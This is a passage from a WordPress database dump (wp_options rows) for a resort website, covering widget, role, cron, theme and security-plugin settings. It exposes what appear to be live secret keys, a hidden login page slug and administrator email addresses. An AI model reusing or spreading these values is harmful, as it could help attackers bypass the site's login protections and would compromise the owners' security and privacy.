s'),(58,'thumbnail_size_h','150','yes'),(59,'thumbnail_crop','1','yes'),(60,'medium_size_w','300','yes'),(61,'medium_size_h','300','yes'),(62,'avatar_default','mystery','yes'),(63,'large_size_w','1024','yes'),(64,'large_size_h','1024','yes'),(65,'image_default_link_type','none','yes'),(66,'image_default_size','','yes'),(67,'image_default_align','','yes'),(68,'close_comments_for_old_posts','0','yes'),(69,'close_comments_days_old','14','yes'),(70,'thread_comments','1','yes'),(71,'thread_comments_depth','5','yes'),(72,'page_comments','0','yes'),(73,'comments_per_page','50','yes'),(74,'default_comments_page','newest','yes'),(75,'comment_order','asc','yes'),(76,'sticky_posts','a:0:{}','yes'),(77,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(78,'widget_text','a:3:{i:1;a:0:{}i:3;a:3:{s:5:\"title\";s:45:\"Plan Your Vacation Here! Call (218) 747- 2959\";s:4:\"text\";s:0:\"\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(80,'uninstall_plugins','a:4:{s:53:\"child-theme-configurator/child-theme-configurator.php\";s:22:\"chld_thm_cfg_uninstall\";s:23:\"elementor/elementor.php\";a:2:{i:0;s:21:\"Elementor\\Maintenance\";i:1;s:9:\"uninstall\";}s:33:\"classic-editor/classic-editor.php\";a:2:{i:0;s:14:\"Classic_Editor\";i:1;s:9:\"uninstall\";}s:45:\"custom-facebook-feed/custom-facebook-feed.php\";s:13:\"cff_uninstall\";}','no'),(81,'timezone_string','America/Chicago','yes'),(82,'page_for_posts','0','yes'),(83,'page_on_front','2','yes'),(84,'default_post_format','0','yes'),(85,'link_manager_enabled','0','yes'),(86,'finished_splitting_shared_terms','1','yes'),(87,'site_icon','143','yes'),(88,'medium_large_size_w','768','yes'),(89,'medium_large_size_h','0','yes'),(90,'initial_db_version','35700','yes'),(91,'ar_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:77:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:20:\"wpseo_manage_options\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;s:29:\"tablepress_import_tables_wptr\";b:1;s:23:\"tablepress_edit_options\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:44:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:19:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:38:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;s:23:\"view_site_health_checks\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),(92,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(93,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(94,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(97,'sidebars_widgets','a:5:{s:19:\"wp_inactive_widgets\";a:5:{i:0;s:10:\"archives-2\";i:1;s:8:\"search-2\";i:2;s:12:\"categories-2\";i:3;s:14:\"recent-posts-2\";i:4;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:0:{}s:14:\"sidebar-footer\";a:0:{}s:14:\"sidebar-header\";a:1:{i:0;s:6:\"text-3\";}s:13:\"array_version\";i:3;}','yes'),(99,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(100,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'cron','a:26:{i:1593109111;a:1:{s:26:\"action_scheduler_run_queue\";a:1:{s:32:\"0d04ed39571b55704c122d726248bbac\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:1:{i:0;s:7:\"WP Cron\";}s:8:\"interval\";i:60;}}}i:1593109433;a:1:{s:40:\"wordfence_completeCoreUpdateNotification\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1593109582;a:1:{s:21:\"wordfence_ls_ntp_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1593111182;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1593112413;a:1:{s:24:\"aiowps_hourly_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1593113014;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1593119344;a:2:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1593119345;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1593119536;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1593119613;a:1:{s:23:\"aiowps_daily_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1593123079;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1593124649;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1593127101;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1593134682;a:2:{s:14:\"updraft_backup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:23:\"updraft_backup_database\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1593141620;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1593144535;a:1:{s:12:\"cff_cron_job\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1593327295;a:1:{s:27:\"wordfence_processAttackData\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1593457200;a:1:{s:28:\"wpforms_email_summaries_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:30:\"wpforms_email_summaries_weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1596676952;a:1:{s:23:\"wordfence_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1597496445;a:1:{s:28:\"wp_update_comment_type_batch\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1598358350;a:1:{s:25:\"wpseo_ping_search_engines\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1604081956;a:1:{s:26:\"wordfence_daily_autoUpdate\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1604081971;a:2:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1604081994;a:2:{s:13:\"wpseo-reindex\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:31:\"wpseo_permalink_structure_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1604350800;a:1:{s:31:\"wordfence_email_activity_report\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}s:7:\"version\";i:2;}','yes'),(137,'recently_activated','a:0:{}','yes'),(143,'aiowpsec_db_version','1.9','yes'),(144,'aio_wp_security_configs','a:83:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:1:\"1\";s:28:\"aiowps_enable_login_lockdown\";s:1:\"1\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";i:5;s:24:\"aiowps_retry_time_period\";i:5;s:26:\"aiowps_lockout_time_length\";i:60;s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:1:\"1\";s:20:\"aiowps_email_address\";s:14:\"dbc@expcom.com\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:0:\"\";s:32:\"aiowps_unlock_request_secret_key\";s:20:\"9rnfgnnlys25zho2zxa6\";s:26:\"aiowps_enable_whitelisting\";s:0:\"\";s:27:\"aiowps_allowed_ip_addresses\";s:0:\"\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"365sxhxnhs7h8p60q5aw\";s:42:\"aiowps_enable_manual_registration_approval\";s:0:\"\";s:39:\"aiowps_enable_registration_page_captcha\";s:0:\"\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:21:\"admin@ashbyresort.com\";s:27:\"aiowps_disable_file_editing\";s:0:\"\";s:37:\"aiowps_prevent_default_wp_file_access\";s:0:\"\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:1:\"1\";s:31:\"aiowps_enable_pingback_firewall\";s:1:\"1\";s:34:\"aiowps_block_debug_log_file_access\";s:1:\"1\";s:26:\"aiowps_disable_index_views\";s:1:\"1\";s:30:\"aiowps_disable_trace_and_track\";s:1:\"1\";s:28:\"aiowps_forbid_proxy_comments\";s:1:\"1\";s:29:\"aiowps_deny_bad_query_strings\";s:1:\"1\";s:34:\"aiowps_advanced_char_string_filter\";s:1:\"1\";s:25:\"aiowps_enable_5g_firewall\";s:1:\"1\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:1:\"1\";s:28:\"aiowps_enable_login_honeypot\";s:1:\"1\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:0:\"\";s:29:\"aiowps_enable_comment_captcha\";s:0:\"\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:21:\"admin@ashbyresort.com\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:22:\"aiowps_login_page_slug\";s:8:\"ar-login\";s:35:\"aiowps_enable_lost_password_captcha\";s:0:\"\";s:28:\"aiowps_block_fake_googlebots\";s:1:\"1\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:1:\"1\";s:25:\"aiowps_enable_6g_firewall\";s:1:\"1\";}','yes'),(149,'_transient_twentysixteen_categories','1','yes'),(158,'theme_mods_twentysixteen','a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1457818464;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}}}}','yes'),(159,'current_theme','Vantage Premium Child','yes'),(160,'theme_mods_university','a:10:{i:0;b:0;s:16:\"background_color\";s:6:\"587abc\";s:16:\"background_image\";s:62:\"http://ashbyresort.com/wp-content/uploads/2016/03/water2-1.jpg\";s:17:\"background_repeat\";s:6:\"repeat\";s:21:\"background_position_x\";s:6:\"center\";s:21:\"background_attachment\";s:6:\"scroll\";s:8:\"logo_img\";s:63:\"http://ashbyresort.com/wp-content/uploads/2016/03/logoSmall.png\";s:16:\"facebook_account\";s:12:\"http://fjdfj\";s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1457821636;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:0:{}}}}','yes'),(161,'theme_switched','','yes'),(167,'nav_menu_options','a:1:{s:8:\"auto_add\";a:1:{i:0;i:2;}}','yes'),(172,'widget_metaslider_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(173,'metaslider_systemcheck','a:2:{s:16:\"wordPressVersion\";b:0;s:12:\"imageLibrary\";b:0;}','yes'),(174,'ml-slider_children','a:0:{}','yes'),(176,'widget_ctup-ads-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(177,'widget_zerif_testim-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(178,'widget_zerif_clients-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(179,'widget_zerif_team-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(181,'theme_mods_vantage','a:26:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:17:\"version_activated\";s:5:\"1.4.4\";s:27:\"_theme_settings_current_tab\";s:1:\"0\";s:38:\"vantage_page_masthead_background_image\";s:66:\"http://ashbyresort.com/wp-content/uploads/2016/03/water2Header.jpg\";s:30:\"vantage_fonts_page_title_color\";s:7:\"#1e73be\";s:35:\"vantage_fonts_content_heading_color\";s:7:\"#2052c9\";s:24:\"vantage_footer_site_into\";s:7:\"#f9f9f9\";s:27:\"vantage_fonts_content_color\";s:7:\"#707070\";s:19:\"vantage_footer_text\";s:7:\"#fcfcfc\";s:17:\"vantage_menu_text\";s:7:\"#fcfcfc\";s:24:\"vantage_menu_second_text\";s:7:\"#b22e25\";s:23:\"vantage_menu_icon_color\";s:7:\"#ff4949\";s:25:\"vantage_menu_search_input\";s:7:\"#1e73be\";s:24:\"vantage_menu_search_icon\";s:7:\"#ffffff\";s:30:\"vantage_menu_search_input_text\";s:7:\"#1e73be\";s:23:\"vantage_footer_headings\";s:7:\"#1e73be\";s:20:\"vantage_footer_links\";s:7:\"#1e73be\";s:25:\"vantage_footer_link_hover\";s:7:\"#2196d1\";s:29:\"vantage_footer_site_into_link\";s:7:\"#ed4836\";s:23:\"vantage_menu_background\";s:7:\"#ba2a2a\";s:30:\"vantage_menu_second_background\";s:7:\"#ffffff\";s:19:\"vantage_menu_search\";s:7:\"#bc2b2b\";s:31:\"vantage_menu_current_background\";s:7:\"#ffffff\";s:25:\"vantage_menu_current_text\";s:7:\"#dd3333\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1459120771;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:5:{i:0;s:10:\"archives-2\";i:1;s:8:\"search-2\";i:2;s:12:\"categories-2\";i:3;s:14:\"recent-posts-2\";i:4;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:0:{}s:14:\"sidebar-footer\";N;s:14:\"sidebar-header\";a:1:{i:0;s:6:\"text-3\";}}}}','yes'),(182,'widget_vantage-social-media','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(183,'widget_circleicon-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(184,'widget_headline-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(186,'vantage_theme_settings','a:44:{s:10:\"logo_image\";s:3:\"208\";s:22:\"logo_in_menu_constrain\";b:1;s:17:\"logo_image_retina\";s:0:\"\";s:16:\"logo_header_text\";s:34:\"For Reservations Call 